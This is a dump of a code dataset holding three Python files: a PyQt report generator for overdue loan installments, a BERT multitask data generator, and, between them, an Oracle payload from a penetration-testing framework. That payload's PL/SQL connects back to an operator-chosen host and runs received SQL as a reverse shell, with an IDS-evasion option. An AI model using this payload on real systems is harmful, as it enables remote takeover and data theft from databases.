blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
11f73fbe56bc17b3b0a1fd41fe7b785b16cb6ab0 | 4a6d784fd44b57d6b2aabae9d2381884cc880aea | /w_form_cuotas_vencidas_30dias.py | 53a4658d5a415681d07bdf21ca61bb9eac419f7d | [] | no_license | blueautomatic/Slam_Sistema_creditos | 0e46c2f23d396793122739f838073eff77df88e3 | 7eb20a90abce53f10dcd18e3d47e9a5f330acbbd | refs/heads/master | 2020-03-26T19:13:36.634824 | 2018-02-05T15:46:42 | 2018-02-05T15:46:42 | 145,254,325 | 0 | 0 | null | 2018-08-18T21:37:23 | 2018-08-18T21:37:23 | null | UTF-8 | Python | false | false | 13,010 | py | import sys,datetime,os
from PyQt5.QtWidgets import QApplication,QDialog,QMessageBox, QTableWidgetItem
from PyQt5 import uic
from form_cuotas_vencidas_30dias import Ui_form_cuotas_vencidas_30dias
from N_cliente import N_datos_personales_cliente, N_party_address, N_party_otros, N_datos_laborales, N_party_garante,N_party_cliente, N_party_contacto
from N_creditos import N_creditos
from N_cuotas import N_cuotas
from PyQt5.QtCore import pyqtRemoveInputHook
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.pagesizes import A4
from reportlab.lib.styles import getSampleStyleSheet,ParagraphStyle
from reportlab.platypus import Spacer, SimpleDocTemplate, Table, TableStyle
from reportlab.platypus import Paragraph, Image
from reportlab.lib import colors
from PyQt5.QtWidgets import QFileDialog
from E_configuracion import configuracion
import subprocess
class Cuotas_vencidas_30dias(QDialog):
    """Dialog that generates PDF reports of overdue installments (cuotas vencidas).

    Offers three buttons, one per ageing bucket (30 / 60 / 90 days overdue).
    Each handler queries the business layer (N_cuotas / N_creditos), builds a
    reportlab PDF listing debtor, credit number, installment number and amount
    owed, saves it under <config root>/pdf/listados/..., shows a confirmation
    QMessageBox and opens the generated file with the platform viewer.
    """
    # NOTE(review): these are *class-level* attributes, shared by every
    # instance and evaluated at import time (Ui_form_cuotas_vencidas_30dias()
    # is instantiated once here). __init__ shadows them with per-instance
    # values, so the class-level ones appear redundant -- confirm before
    # removing.
    obj_form = Ui_form_cuotas_vencidas_30dias()
    listado_cuotas_30_dias = list()
    listado_cuotas_60_dias = list()
    listado_cuotas_90_dias = list()
    def __init__(self):
        """Build the UI and wire each 'generar' button to its report handler."""
        QDialog.__init__(self)
        self.obj_form = Ui_form_cuotas_vencidas_30dias()
        self.obj_form.setupUi(self)
        self.obj_form.boton_generar.clicked.connect(self.generar_30dias)
        self.obj_form.boton_generar_60_dias.clicked.connect(self.generar_60dias)
        self.obj_form.boton_generar_90_dias.clicked.connect(self.generar_90dias)
    def generar_30dias(self):
        """Generate and open the PDF listing installments up to 30 days overdue."""
        obj_N_cuotas = N_cuotas(1)
        self.listado_cuotas_30_dias = obj_N_cuotas.lista_cuotas_venc_30_dias()
        styleSheet=getSampleStyleSheet()
        #pyqtRemoveInputHook()
        #import pdb; pdb.set_trace()
        # Header banner image; assumes "cabezal.png" exists in the current
        # working directory -- TODO confirm.
        img=Image("cabezal.png",250,75)
        img.hAlign = "LEFT"
        #pyqtRemoveInputHook()
        #import pdb; pdb.set_trace()
        otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
        style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
        texto_principal = ""
        estilo_texto = ParagraphStyle('',
                                      fontSize = 22,
                                      alignment = 0,
                                      spaceBefore = 0,
                                      spaceAfter = 0,
                                      #backColor = '#fff',
                                      textColor = '#999',
                                      leftIndent = 10 )
        h = Paragraph( texto_principal, estilo_texto)
        banner = [ [ img,h ] ]
        # NOTE(review): `options` is never used in this method.
        options = QFileDialog.Options()
        story=[]
        ban = Table( banner, colWidths=300, rowHeights=10)
        ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
                       ('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
        story.append(ban)
        story.append(Spacer(0,-17))
        P= Paragraph("<b>Reportes</b> ",otro_estilo)
        story.append(P)
        story.append(Spacer(0,25))
        P=Paragraph("<b>Cuotas vencidas hasta 30 dias</b> " + str(datetime.datetime.now()),style_barra)
        story.append(P)
        story.append(Spacer(0,25))
        #nombre apellido dni  Nro prestamo nro cuota  monto
        integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
                       ['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
        #pyqtRemoveInputHook()
        #import pdb; pdb.set_trace()
        # One table row per overdue installment: amount owed = first-due
        # amount plus accrued penalties (punitorios).
        for item in self.listado_cuotas_30_dias:
            monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
            obj_N_credito = N_creditos(1)
            obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
            obj_N_datos_personales_cliente = N_datos_personales_cliente()
            obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
            integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(monto_adeudado)])
        t=Table(integrantes, (150,135, 100, 55, 55,55))
        t.setStyle(TableStyle([
            ('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
            ('BOX', (0,1), (-1,-1), 0.25, colors.black),
            ('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
        ]))
        story.append(t)
        story.append(Spacer(0,15))
        # Output directory is <config root>/pdf/listados/list_morosos_30dias<year>_<month>.
        obj_config = configuracion()
        cadena = obj_config.ruta()
        file_path = cadena + "/pdf/listados/list_morosos_30dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
        if not os.path.exists(file_path):
            os.makedirs(file_path)
        doc=SimpleDocTemplate(file_path +"/listado_de_morosos_30dias.pdf")
        doc.build(story )
        msgBox = QMessageBox()
        msgBox.setWindowTitle("Estado de Listado")
        msgBox.setText("El Listado se ha generado correctamente : ticket listado_de_morosos_30dias.pdf")
        msgBox.exec_()
        # Open the PDF with the platform default viewer (xdg-open on Linux,
        # os.startfile elsewhere -- the latter only exists on Windows).
        if sys.platform == 'linux':
            subprocess.call(["xdg-open", file_path +"/listado_de_morosos_30dias.pdf"])
        else:
            os.startfile( file_path +"/listado_de_morosos_30dias.pdf")
    def generar_60dias(self):
        """Generate and open the PDF listing installments up to 60 days overdue.

        Same flow as generar_30dias but: queries
        lista_cuotas_venc_60_dias("slam"), rounds the owed amount to 2
        decimals, and writes to the .../list_morosos_60dias<year>_<month> dir.
        """
        obj_N_cuotas = N_cuotas(1)
        self.listado_cuotas_60_dias = obj_N_cuotas.lista_cuotas_venc_60_dias("slam")
        styleSheet=getSampleStyleSheet()
        #pyqtRemoveInputHook()
        #import pdb; pdb.set_trace()
        img=Image("cabezal.png",250,75)
        img.hAlign = "LEFT"
        #pyqtRemoveInputHook()
        #import pdb; pdb.set_trace()
        otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
        style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
        texto_principal = ""
        estilo_texto = ParagraphStyle('',
                                      fontSize = 22,
                                      alignment = 0,
                                      spaceBefore = 0,
                                      spaceAfter = 0,
                                      #backColor = '#fff',
                                      textColor = '#999',
                                      leftIndent = 10 )
        h = Paragraph( texto_principal, estilo_texto)
        banner = [ [ img,h ] ]
        # NOTE(review): `options` is never used in this method.
        options = QFileDialog.Options()
        story=[]
        ban = Table( banner, colWidths=300, rowHeights=10)
        ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
                       ('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
        story.append(ban)
        story.append(Spacer(0,10))
        P= Paragraph("<b>Reportes</b> ",otro_estilo)
        story.append(P)
        story.append(Spacer(0,25))
        P=Paragraph("<b>Cuotas vencidas hasta 60 dias</b> "+ str(datetime.datetime.now()),style_barra)
        story.append(P)
        story.append(Spacer(0,25))
        #nombre apellido dni  Nro prestamo nro cuota  monto
        integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
                       ['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
        for item in self.listado_cuotas_60_dias:
            monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
            obj_N_credito = N_creditos(1)
            obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
            obj_N_datos_personales_cliente = N_datos_personales_cliente()
            obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
            integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(round(monto_adeudado,2))])
        t=Table(integrantes, (150,135, 100, 55, 55,55))
        t.setStyle(TableStyle([
            ('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
            ('BOX', (0,1), (-1,-1), 0.25, colors.black),
            ('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
        ]))
        story.append(t)
        story.append(Spacer(0,15))
        obj_config = configuracion()
        cadena = obj_config.ruta()
        file_path = cadena + "/pdf/listados/list_morosos_60dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
        if not os.path.exists(file_path):
            os.makedirs(file_path)
        doc=SimpleDocTemplate(file_path +"/listado_de_morosos_60dias.pdf")
        doc.build(story )
        msgBox = QMessageBox()
        msgBox.setWindowTitle("Estado de Listado")
        msgBox.setText("El Listado se ha generado correctamente : Listado listado_de_morosos_60dias.pdf")
        msgBox.exec_()
        if sys.platform == 'linux':
            subprocess.call(["xdg-open", file_path +"/listado_de_morosos_60dias.pdf"])
        else:
            os.startfile( file_path +"/listado_de_morosos_60dias.pdf")
    def generar_90dias(self):
        """Generate and open the PDF listing installments up to 90 days overdue.

        Same flow as generar_60dias (rounds amounts), but with a slightly
        wider name column and output under .../listado_de_morosos_90dias<year>_<month>.
        """
        obj_N_cuotas = N_cuotas(1)
        self.listado_cuotas_90_dias = obj_N_cuotas.lista_cuotas_venc_90_dias("slam")
        styleSheet=getSampleStyleSheet()
        #pyqtRemoveInputHook()
        #import pdb; pdb.set_trace()
        img=Image("cabezal.png",250,75)
        img.hAlign = "LEFT"
        #pyqtRemoveInputHook()
        #import pdb; pdb.set_trace()
        otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
        style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
        texto_principal = ""
        estilo_texto = ParagraphStyle('',
                                      fontSize = 22,
                                      alignment = 0,
                                      spaceBefore = 0,
                                      spaceAfter = 0,
                                      #backColor = '#fff',
                                      textColor = '#999',
                                      leftIndent = 10 )
        h = Paragraph( texto_principal, estilo_texto)
        banner = [ [ img,h ] ]
        # NOTE(review): `options` is never used in this method.
        options = QFileDialog.Options()
        story=[]
        ban = Table( banner, colWidths=300, rowHeights=10)
        ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
                       ('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
        story.append(ban)
        story.append(Spacer(0,-17))
        P= Paragraph("<b>Reportes</b> ",otro_estilo)
        story.append(P)
        story.append(Spacer(0,25))
        P=Paragraph("<b>Cuotas vencidas hasta 90 dias</b> " + str(datetime.datetime.now()),style_barra)
        story.append(P)
        story.append(Spacer(0,25))
        #nombre apellido dni  Nro prestamo nro cuota  monto
        integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
                       ['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
        for item in self.listado_cuotas_90_dias:
            monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
            obj_N_credito = N_creditos(1)
            obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
            obj_N_datos_personales_cliente = N_datos_personales_cliente()
            obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
            integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(round(monto_adeudado,2))])
        t=Table(integrantes, (150,155, 100, 55, 55,55))
        t.setStyle(TableStyle([
            ('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
            ('BOX', (0,1), (-1,-1), 0.25, colors.black),
            ('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
        ]))
        story.append(t)
        story.append(Spacer(0,15))
        obj_config = configuracion()
        cadena = obj_config.ruta()
        file_path = cadena + "/pdf/listados/listado_de_morosos_90dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
        if not os.path.exists(file_path):
            os.makedirs(file_path)
        doc=SimpleDocTemplate(file_path +"/listado_de_morosos_90dias.pdf")
        doc.build(story )
        msgBox = QMessageBox()
        msgBox.setWindowTitle("Estado de Listado")
        msgBox.setText("El Listado se ha generado correctamente : Listado listado_de_morosos_90dias.pdf")
        msgBox.exec_()
        if sys.platform == 'linux':
            subprocess.call(["xdg-open", file_path +"/listado_de_morosos_90dias.pdf"])
        else:
            os.startfile( file_path +"/listado_de_morosos_90dias.pdf")
#app = QApplication(sys.argv)
#dialogo= Cuotas_vencidas_30dias()
#dialogo.show()
#app.exec_()
| [
"[email protected]"
] | |
8cae290d2e0f4814c027458fafbd56b76c6c8859 | e99bc88c211c00a701514761fdfcb9b755e6de4e | /payloads/oracle/reverse_sql.py | c8a4d05996c833f8976901daa94da532f212e589 | [] | no_license | Wuodan/inguma | 177f40f636d363f081096c42def27986f05e37e7 | c82e7caf86e24ad9783a2748c4f1d9148ad3d0ee | refs/heads/master | 2020-03-26T21:52:28.421738 | 2013-03-20T20:45:13 | 2018-08-20T12:19:30 | 145,413,992 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,506 | py | #!/usr/bin/python
"""
NOTE: Should be rewritten from scratch!!!!
"""
import sys
sys.path.append("../../lib")
sys.path.append("../lib")
sys.path.append("lib")
import run_command
from oracleids import randomizeSpaces
data = """
DECLARE
data varchar2(32767);
v_ret varchar2(32767);
len number;
conn utl_tcp.connection;
BEGIN
conn := utl_tcp.open_connection(remote_host => '%HOST%', remote_port => %PORT%, charset => 'US7ASCII');
loop
data := utl_tcp.get_line(conn);
data := substr(data, 1, length(data)-1);
if lower(data) = 'exit' then
exit;
else
begin
if lower(data) like 'select%' then
execute immediate data into v_ret;
else
execute immediate data;
v_ret := 'Statement executed';
end if;
len := utl_tcp.write_line(conn, 'RET:' || v_ret);
exception
when others then
len := utl_tcp.write_line(conn, 'ERROR: ' || sqlcode || ' - ' || sqlerrm);
end;
end if;
dbms_output.put_line('"' || data || '"');
end loop;
utl_tcp.close_connection(conn);
END;
"""
name = "reverse_sql"
brief_description = "Run a blind reverse SQL terminal"
class CPayload:
    """Payload that opens a blind reverse SQL shell on an Oracle target.

    ``run()`` fills the module-level PL/SQL template (``data``) with the
    attacker's host/port and hands it to ``run_command.CPayload`` for
    execution; the injected block connects back via UTL_TCP and executes
    lines it receives as SQL until it reads "exit".
    """
    # Default connection/behaviour settings; callers typically override
    # these attributes before invoking run().
    user = "TEST"
    function = "F1"
    useDML = False
    # Number/level of IDS-evasion techniques to apply (0 = none).
    covert = 0
    verifyCommand = ""
    connection = None
    type = 0
    host = ""
    port = ""
    # NOTE(review): duplicate assignment -- `connection` is already set above.
    connection = None
    def __init__(self):
        pass
    def run(self):
        """Build the PL/SQL payload and execute it; returns run_command's result."""
        global data
        tmp = data
        # NOTE(review): the template in `data` contains no %USER% placeholder,
        # so this replace is a no-op -- confirm whether it is still needed.
        tmp = tmp.replace("%USER%", self.user)
        # Prompt interactively when host/port were not set by the caller.
        # NOTE(review): raw_input is Python 2 only.
        if self.host == "":
            self.host = raw_input("Host to connect: ")
        if self.port == "":
            self.port = raw_input("Port to listen: ")
        tmp = tmp.replace("%HOST%", self.host)
        tmp = tmp.replace("%PORT%", self.port)
        if self.covert > 0:
            # Currently only one IDS evasion technique is used
            tmp = randomizeSpaces(tmp)
        objRun = run_command.CPayload()
        objRun.idsTechniques = self.covert
        objRun.user = self.user
        objRun.command = tmp
        ret = objRun.run()
        return ret
    def verify(self, connection):
        """Run ``verifyCommand`` on the connection; True iff it returns any row."""
        sql = self.verifyCommand
        cursor = connection.cursor()
        cursor.execute(sql)
        for x in cursor.fetchall():
            return True
        return False
def main():
    """Smoke-test entry point: build the payload and print run()'s result."""
    # Imported here to fail fast if the Oracle driver is missing; not used
    # directly by this function.
    import cx_Oracle
    a = CPayload()
    # NOTE(review): run() reads ``self.covert`` (and forwards it as
    # ``idsTechniques`` to run_command); setting ``idsTechniques`` on this
    # object looks like it was meant to be ``a.covert = 1`` -- confirm
    # before changing, since it would enable randomizeSpaces().
    a.idsTechniques = 1
    cmd = a.run()
    # print() works on both Python 2 and 3; the original ``print cmd``
    # statement is a SyntaxError under Python 3.
    print(cmd)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
acdee8e7dc59c9448b02b36d294aed46fbe74f2f | 0ca3a635fe2358ae562c04516226753fcd4a6729 | /src/create_generators.py | 64893b0a27c4158567b3833c44c58fc9d82963d0 | [] | no_license | YL1113/bert-multitask-learning | 9302037537c9c50a49ba2bb53a2f1db15904c7e2 | 182cb78efba46905cc1a804dcd7771b40475e874 | refs/heads/master | 2020-04-29T16:57:56.837957 | 2019-03-18T07:06:05 | 2019-03-18T07:06:05 | 176,280,952 | 1 | 0 | null | 2019-03-18T12:32:51 | 2019-03-18T12:32:50 | null | UTF-8 | Python | false | false | 16,070 | py | import random
from copy import copy
import numpy as np
import tensorflow as tf
from .utils import (punc_augument, tokenize_text_with_seqs,
create_mask_and_padding, create_masked_lm_predictions,
truncate_seq_pair, add_special_tokens_with_seqs,
BOS_TOKEN, EOS_TOKEN,
create_instances_from_document)
from .tokenization import printable_text
def create_single_problem_generator(problem,
                                    inputs_list,
                                    target_list,
                                    label_encoder,
                                    params,
                                    tokenizer,
                                    mode):
    """Yield per-example feature dicts for a single problem.

    This function will:
    1. Do some text cleaning using original bert tokenizer, if
        problem type is sequential tagging, corresponding labels
        will be removed.

        Example:
        Before: inputs: ['a', '&', 'c'] target: [0, 0, 1]
        After: inputs: ['a', 'c'] target: [0, 1]
    2. Add [CLS], [SEP] tokens
    3. Padding
    4. yield result dict (input_ids / input_mask / segment_ids /
       <problem>_label_ids, plus masked-LM features when
       params.augument_mask_lm is on, plus <problem>_mask for seq2seq)

    Arguments:
        problem {str} -- problem name
        inputs_list {list } -- inputs list; each element is either a text
            sequence or a dict with keys 'a' and 'b' for sentence pairs
        target_list {list} -- target list, should have the same length as inputs list
        label_encoder {LabelEncoder} -- label encoder
        params {Params} -- params
        tokenizer {tokenizer} -- Bert Tokenizer
        mode {str} -- 'train' enables augmentation; other values disable it
    """
    problem_type = params.problem_type[problem]
    # whether this problem is sequential labeling
    # for sequential labeling, targets needs to align with any
    # change of inputs
    is_seq = problem_type in ['seq_tag']
    for ex_index, example in enumerate(zip(inputs_list, target_list)):
        raw_inputs, raw_target = example
        # punctuation augumentation
        if params.punc_replace_prob > 0 and mode == 'train':
            raw_inputs = punc_augument(raw_inputs, params)
        # tokenize inputs, now the length is fixed, target == raw_target
        if isinstance(raw_inputs, dict):
            tokens_a, target = tokenize_text_with_seqs(
                tokenizer, raw_inputs['a'], raw_target, is_seq)
            tokens_b, _ = tokenize_text_with_seqs(
                tokenizer, raw_inputs['b'], raw_target)
        else:
            tokens_a, target = tokenize_text_with_seqs(
                tokenizer, raw_inputs, raw_target, is_seq)
            tokens_b = None
        if tokens_b is not None and is_seq:
            raise NotImplementedError(
                'Sequence Labeling with tokens b is not implemented')
        if not tokens_a:
            continue
        # check whether tokenization changed the length
        # NOTE(review): for dict (sentence-pair) inputs, len(raw_inputs) is
        # the number of dict keys (2), so this comparison looks wrong for
        # that case and would skip most pair examples -- confirm intent.
        if len(raw_inputs) != len(tokens_a):
            tf.logging.warning('Data %d broken' % ex_index)
            continue
        # truncate tokens and target to max_seq_len
        tokens_a, tokens_b, target = truncate_seq_pair(
            tokens_a, tokens_b, target, params.max_seq_len, is_seq=is_seq)
        # add [SEP], [CLS] tokens
        tokens, segment_ids, target = add_special_tokens_with_seqs(
            tokens_a, tokens_b, target, is_seq)
        # train mask lm as augument task while training
        if params.augument_mask_lm and mode == 'train':
            # Unseeded RNG: masking positions differ between runs.
            rng = random.Random()
            (mask_lm_tokens, masked_lm_positions,
             masked_lm_labels) = create_masked_lm_predictions(
                 tokens,
                 params.masked_lm_prob,
                 params.max_predictions_per_seq,
                 list(tokenizer.vocab.keys()), rng)
            _, mask_lm_tokens, _, _ = create_mask_and_padding(
                mask_lm_tokens, copy(segment_ids), copy(target), params.max_seq_len, is_seq)
            masked_lm_weights, masked_lm_labels, masked_lm_positions, _ = create_mask_and_padding(
                masked_lm_labels, masked_lm_positions, None, params.max_predictions_per_seq)
            mask_lm_input_ids = tokenizer.convert_tokens_to_ids(
                mask_lm_tokens)
            masked_lm_ids = tokenizer.convert_tokens_to_ids(masked_lm_labels)
        input_mask, tokens, segment_ids, target = create_mask_and_padding(
            tokens, segment_ids, target, params.max_seq_len, is_seq)
        # create mask and padding for labels of seq2seq problem
        if problem_type in ['seq2seq_tag', 'seq2seq_text']:
            target, _, _ = truncate_seq_pair(
                target, None, None, params.decode_max_seq_len, is_seq=is_seq)
            # since we initialize the id to 0 in prediction, we need
            # to make sure that BOS_TOKEN is [PAD]
            target = [BOS_TOKEN] + target + [EOS_TOKEN]
            label_mask, target, _, _ = create_mask_and_padding(
                target, [0] * len(target), None, params.decode_max_seq_len)
        input_ids = tokenizer.convert_tokens_to_ids(tokens)
        # Sequence targets -> list of int32 ids; scalar target -> single id.
        if isinstance(target, list):
            label_id = label_encoder.transform(target).tolist()
            label_id = [np.int32(i) for i in label_id]
        else:
            label_id = label_encoder.transform([target]).tolist()[0]
            label_id = np.int32(label_id)
        assert len(input_ids) == params.max_seq_len
        assert len(input_mask) == params.max_seq_len
        assert len(segment_ids) == params.max_seq_len, segment_ids
        if is_seq:
            assert len(label_id) == params.max_seq_len
        # logging in debug mode
        if ex_index < 5:
            tf.logging.debug("*** Example ***")
            tf.logging.debug("tokens: %s" % " ".join(
                [printable_text(x) for x in tokens]))
            tf.logging.debug("input_ids: %s" %
                             " ".join([str(x) for x in input_ids]))
            tf.logging.debug("input_mask: %s" %
                             " ".join([str(x) for x in input_mask]))
            tf.logging.debug("segment_ids: %s" %
                             " ".join([str(x) for x in segment_ids]))
            if is_seq or problem_type in ['seq2seq_tag', 'seq2seq_text']:
                tf.logging.debug("%s_label_ids: %s" %
                                 (problem, " ".join([str(x) for x in label_id])))
                tf.logging.debug("%s_label: %s" %
                                 (problem, " ".join([str(x) for x in target])))
            else:
                tf.logging.debug("%s_label_ids: %s" %
                                 (problem, str(label_id)))
                tf.logging.debug("%s_label: %s" %
                                 (problem, str(target)))
            if params.augument_mask_lm and mode == 'train':
                tf.logging.debug("mask lm tokens: %s" % " ".join(
                    [printable_text(x) for x in mask_lm_tokens]))
                tf.logging.debug("mask lm input_ids: %s" %
                                 " ".join([str(x) for x in mask_lm_input_ids]))
                tf.logging.debug("mask lm label ids: %s" %
                                 " ".join([str(x) for x in masked_lm_ids]))
                tf.logging.debug("mask lm position: %s" %
                                 " ".join([str(x) for x in masked_lm_positions]))
        # create return dict
        if not params.augument_mask_lm:
            return_dict = {
                'input_ids': input_ids,
                'input_mask': input_mask,
                'segment_ids': segment_ids,
                '%s_label_ids' % problem: label_id
            }
        else:
            # With probability augument_rate emit the masked-LM view of the
            # example; otherwise emit the clean view with zeroed LM features.
            if mode == 'train' and random.uniform(0, 1) <= params.augument_rate:
                return_dict = {
                    'input_ids': mask_lm_input_ids,
                    'input_mask': input_mask,
                    'segment_ids': segment_ids,
                    '%s_label_ids' % problem: label_id,
                    "masked_lm_positions": masked_lm_positions,
                    "masked_lm_ids": masked_lm_ids,
                    "masked_lm_weights": masked_lm_weights,
                }
            else:
                return_dict = {
                    'input_ids': input_ids,
                    'input_mask': input_mask,
                    'segment_ids': segment_ids,
                    '%s_label_ids' % problem: label_id,
                    "masked_lm_positions": np.zeros([params.max_predictions_per_seq]),
                    "masked_lm_ids": np.zeros([params.max_predictions_per_seq]),
                    "masked_lm_weights": np.zeros([params.max_predictions_per_seq]),
                }
        if problem_type in ['seq2seq_tag', 'seq2seq_text']:
            return_dict['%s_mask' % problem] = label_mask
        yield return_dict
def create_pretraining_generator(problem,
                                 inputs_list,
                                 target_list,
                                 label_encoder,
                                 params,
                                 tokenizer
                                 ):
    """Slight modification of original code

    Yields BERT pretraining feature dicts (masked LM + next-sentence
    prediction) built from `inputs_list`, which must be a list of
    documents, each a list of sentences, each a list of words.
    `target_list` and `label_encoder` are unused here.

    Raises:
        ValueError -- Input format not right
    """
    if not isinstance(inputs_list[0][0], list):
        raise ValueError('inputs is expected to be list of list of list.')
    # Tokenize every sentence of every document with the BERT tokenizer.
    all_documents = []
    for document in inputs_list:
        all_documents.append([])
        for sentence in document:
            all_documents[-1].append(tokenizer.tokenize('\t'.join(sentence)))
    # Drop empty documents and shuffle (unseeded RNG -> order varies per run).
    all_documents = [d for d in all_documents if d]
    rng = random.Random()
    rng.shuffle(all_documents)
    vocab_words = list(tokenizer.vocab.keys())
    instances = []
    print_count = 0
    # Each pass over the corpus produces a different random masking
    # (dupe_factor passes total, as in the original BERT pretraining code).
    for _ in range(params.dupe_factor):
        for document_index in range(len(all_documents)):
            instances = create_instances_from_document(
                all_documents,
                document_index,
                params.max_seq_len,
                params.short_seq_prob,
                params.masked_lm_prob,
                params.max_predictions_per_seq,
                vocab_words, rng)
            for instance in instances:
                tokens = instance.tokens
                segment_ids = list(instance.segment_ids)
                # Pad tokens/segments up to max_seq_len and build input_mask.
                input_mask, tokens, segment_ids, _ = create_mask_and_padding(
                    tokens, segment_ids, None, params.max_seq_len)
                masked_lm_positions = list(instance.masked_lm_positions)
                masked_lm_weights, masked_lm_labels, masked_lm_positions, _ = create_mask_and_padding(
                    instance.masked_lm_labels, masked_lm_positions, None, params.max_predictions_per_seq)
                input_ids = tokenizer.convert_tokens_to_ids(tokens)
                masked_lm_ids = tokenizer.convert_tokens_to_ids(
                    masked_lm_labels)
                next_sentence_label = 1 if instance.is_random_next else 0
                yield_dict = {
                    "input_ids": input_ids,
                    "input_mask": input_mask,
                    "segment_ids": segment_ids,
                    "masked_lm_positions": masked_lm_positions,
                    "masked_lm_ids": masked_lm_ids,
                    "masked_lm_weights": masked_lm_weights,
                    "next_sentence_label_ids": next_sentence_label
                }
                # Log the first few instances for debugging.
                if print_count < 3:
                    tf.logging.debug('%s : %s' %
                                     ('tokens', ' '.join([str(x) for x in tokens])))
                    for k, v in yield_dict.items():
                        if not isinstance(v, int):
                            tf.logging.debug('%s : %s' %
                                             (k, ' '.join([str(x) for x in v])))
                    print_count += 1
                yield yield_dict
def create_generator(params, mode, epoch):
    """Function to create iterator for multiple problem

    This function does the following things:
    1. Create dummy labels for each problems.
    2. Initialize all generators
    3. Sample a problem to train at this batch. If eval, take turns
    4. Create a loss multiplier
    5. Tried to generate samples for target problem, if failed, init gen
    6. Add dummy label to other problems

    Example:
        Problem: CWS|NER|weibo_ner&weibo_cws
        1. Dummy labels: CWS_label_ids: [0,0,0] ...
        2. Blablabla
        3. Sample, say (weibo_ner&weibo_cws)
        4. loss multipliers: {'CWS_loss_multiplier': 0, ..., 'weibo_ner_loss_multiplier': 1, ...}
        ...

    Arguments:
        params {Params} -- params
        mode {mode} -- mode
        epoch {int} -- epochs to run
            NOTE(review): `epoch` is not referenced in the body -- confirm
            whether it is still needed by callers.
    """
    # example
    # problem_list: ['NER', 'CWS', 'weibo_ner', 'weibo_cws']
    # problem_chunk: [['NER'], ['CWS'], ['weibo_ner', 'weibo_cws']]
    problem_list = []
    problem_chunk = []
